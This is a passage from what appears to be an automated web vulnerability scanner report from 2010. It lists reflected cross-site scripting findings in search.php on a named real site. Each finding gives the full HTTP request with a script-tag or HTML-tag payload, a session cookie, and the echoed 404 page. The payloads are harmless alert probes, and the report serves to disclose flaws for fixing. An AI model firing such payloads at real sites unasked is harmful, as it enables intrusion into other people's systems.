Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ad24a<a>8fac13f03d9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...ad24a<a>8fac13f03d9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...ad24a<a>8fac13f03d9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2530. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a14e2<script>alert(1)</script>da99364b879 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&a14e2<script>alert(1)</script>da99364b879=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&a14e2<script>alert(1)</script>da99364b879=1 was not found on this server.</p>
...[SNIP]...

2.2531. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ed741<a>6eb02ca4432 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2ed741<a>6eb02ca4432 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2ed741<a>6eb02ca4432 was not found on this server.</p>
...[SNIP]...

2.2532. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8e1d<script>alert(1)</script>367bbbf9336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb8e1d<script>alert(1)</script>367bbbf9336/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb8e1d<script>alert(1)</script>367bbbf9336/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2533. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 237ab<script>alert(1)</script>d732f6c606d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37237ab<script>alert(1)</script>d732f6c606d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37237ab<script>alert(1)</script>d732f6c606d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2534. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27bba<script>alert(1)</script>7e21435fea2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes27bba<script>alert(1)</script>7e21435fea2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes27bba<script>alert(1)</script>7e21435fea2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2535. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b445<script>alert(1)</script>6e654bc30b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos4b445<script>alert(1)</script>6e654bc30b1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos4b445<script>alert(1)</script>6e654bc30b1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2536. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 771a0<script>alert(1)</script>8d7109893f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/search.php771a0<script>alert(1)</script>8d7109893f2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php771a0<script>alert(1)</script>8d7109893f2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2537. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 196fc<a>f2ca015ff03 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search196fc<a>f2ca015ff03&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search196fc<a>f2ca015ff03&opt=2 was not found on this server.</p>
...[SNIP]...

2.2538. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ce0a9<a>ccb599750f4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...ce0a9<a>ccb599750f4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...ce0a9<a>ccb599750f4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2539. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e39c5<script>alert(1)</script>195bdf3028f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e39c5<script>alert(1)</script>195bdf3028f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e39c5<script>alert(1)</script>195bdf3028f=1 was not found on this server.</p>
...[SNIP]...

2.2540. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d21c3<a>76bd2b87947 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d21c3<a>76bd2b87947 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d21c3<a>76bd2b87947 was not found on this server.</p>
...[SNIP]...

2.2541. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f37f<script>alert(1)</script>0dbd3f18974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5f37f<script>alert(1)</script>0dbd3f18974/37/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5f37f<script>alert(1)</script>0dbd3f18974/37/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2542. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e389<script>alert(1)</script>91fa49deb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/377e389<script>alert(1)</script>91fa49deb8/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/377e389<script>alert(1)</script>91fa49deb8/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2543. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd270<script>alert(1)</script>75061f5b4c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themescd270<script>alert(1)</script>75061f5b4c1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themescd270<script>alert(1)</script>75061f5b4c1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2544. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eccf2<script>alert(1)</script>12775ebe60c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/search.phpeccf2<script>alert(1)</script>12775ebe60c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.phpeccf2<script>alert(1)</script>12775ebe60c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2545. http://www.resellerbase.com/detail/37/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a74dd<a>7af78abbe6b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Searcha74dd<a>7af78abbe6b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...&Submit3=Searcha74dd<a>7af78abbe6b&opt=2 was not found on this server.</p>
...[SNIP]...

2.2546. http://www.resellerbase.com/detail/37/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e90a8<a>57582dc67da was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/search.php?keyword=search...e90a8<a>57582dc67da&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...e90a8<a>57582dc67da&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2547. http://www.resellerbase.com/detail/37/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

